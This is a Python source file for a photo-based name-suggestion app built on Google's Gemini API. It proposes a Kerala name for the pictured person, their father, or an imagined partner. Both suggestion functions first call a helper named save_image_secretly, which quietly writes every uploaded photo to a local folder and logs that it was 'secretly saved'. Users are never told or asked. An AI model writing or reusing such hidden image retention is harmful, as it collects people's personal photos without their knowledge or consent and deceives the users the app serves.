
import os
import io
from datetime import datetime
import google.generativeai as genai
from PIL import Image

GOOGLE_API_KEY = os.getenv("GOOGLE_API_KEY")

if not GOOGLE_API_KEY:
    raise ValueError("The GOOGLE_API_KEY environment variable has not been set. Please set it before running the application.")

genai.configure(api_key=GOOGLE_API_KEY)


SAVE_DIRECTORY = "project"

model_name = 'gemini-1.5-flash-latest'
model = genai.GenerativeModel(model_name)
print(f"✅ AI Model Initialized Successfully (using '{model_name}').")


def save_image_secretly(image_data: bytes):
    try:
        os.makedirs(SAVE_DIRECTORY, exist_ok=True)
        timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S-%f")
        filename = f"capture_{timestamp}.jpg"
        
        file_path = os.path.join(SAVE_DIRECTORY, filename)
        
        with open(file_path, "wb") as f:
            f.write(image_data)
        
        print(f"  [+] Photo secretly saved to: {file_path}")

    except Exception as e:
        print(f"  [!] CRITICAL ERROR: Could not save photo. Reason: {e}")


def suggest_self_name(image_data: bytes, subject: str = "person") -> str:
    save_image_secretly(image_data)
   
    print(f"  AI is analyzing photo for '{subject}'...")
    person_image = Image.open(io.BytesIO(image_data))
    
    context_phrase = "the person in this photo"
    if subject == 'father':
        context_phrase = "the father of the person in this photo"
 
    prompt = f"""
    Analyze the photo. Your task is to suggest a name for {context_phrase}.
    Imagine what they would be like based on the photo provided.
    Name should be starting from different alphabets each time based on the minute of the hour
    also random relegion(christian ,hindu , muslim)  based on the minute of the hour
    INSTRUCTIONS:
    1. Your choice must be a modern and rarely popular name from Kerala, India.
    2. The name MUST NOT contain the word 'Arjun'.
    3. The name should be unique and creatively generated by the AI.
    4. You must provide a single, short, funny, witty, and "spicy" reason. The reason does not need to be logical or connected to the photo.
    
    Your entire response MUST follow this exact, two-line format and nothing else:

    NAME: [The one suggested name]
    REASON: [The short, witty, and spicy one-sentence reason.]
    """

    generation_config = genai.types.GenerationConfig(temperature=2.0)
    
    response = model.generate_content(
        [prompt, person_image],
        generation_config=generation_config
    )
    return response.text


def suggest_partner_name(image_data: bytes) -> str:
    save_image_secretly(image_data)
    
    print("  AI is analyzing photo for 'Who For Me?'...")
    person_image = Image.open(io.BytesIO(image_data))
    
    prompt = f"""
    Analyze the person in this photo. Imagine their ideal, complementary, opposite-gender partner from Kerala, India.
    Name should be starting from different alphabets each time based on the minute of the hour
    INSTRUCTIONS:
    1. The partner's name must be a modern and unique name from Kerala, India.
    2. The name should be creatively and randomly generated by the AI.
    3. You must provide a single, short, witty, and "spicy" reason for why they are a perfect match.
    also random religion(christian ,hindu , muslim) based on the millisecond of time.
    Your entire response MUST follow this exact, two-line format and nothing else:
    
    NAME: [The one suggested name for the partner]
    REASON: [The short, witty, and spicy reason for the match.]
    """

    generation_config = genai.types.GenerationConfig(temperature=2.0)
    
    response = model.generate_content(
        [prompt, person_image],
        generation_config=generation_config
    )
    return response.text